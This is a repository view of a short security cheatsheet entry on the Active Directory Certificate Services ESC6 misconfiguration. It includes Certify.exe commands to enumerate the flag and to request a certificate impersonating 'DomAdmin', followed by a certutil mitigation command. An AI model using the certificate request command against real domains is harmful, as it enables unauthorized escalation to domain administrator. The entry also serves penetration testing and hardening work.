daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc06.md (1401B)


      1 ---
      2 title: "Active Directory - Certificate ESC6"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc06.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc06.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC6
     12 
     13 ## ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
     14 
     15 > If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
     16 
     17 **Exploitation**
     18 
     19 * Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
     20 
     21     ```ps1
     22     Certify.exe cas
     23     ```
     24 
     25 * Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
     26 
     27     ```ps1
     28     .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
     29     ```
     30 
     31 **Mitigation**
     32 
     33 * Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
     34 
     35 ## References
     36 
     37 * [AD CS: from ManageCA to RCE - February 11, 2022 - Pablo Martínez, Kurosh Dabbagh](https://web.archive.org/web/20220212053945/http://www.blackarrow.net/ad-cs-from-manageca-to-rce//)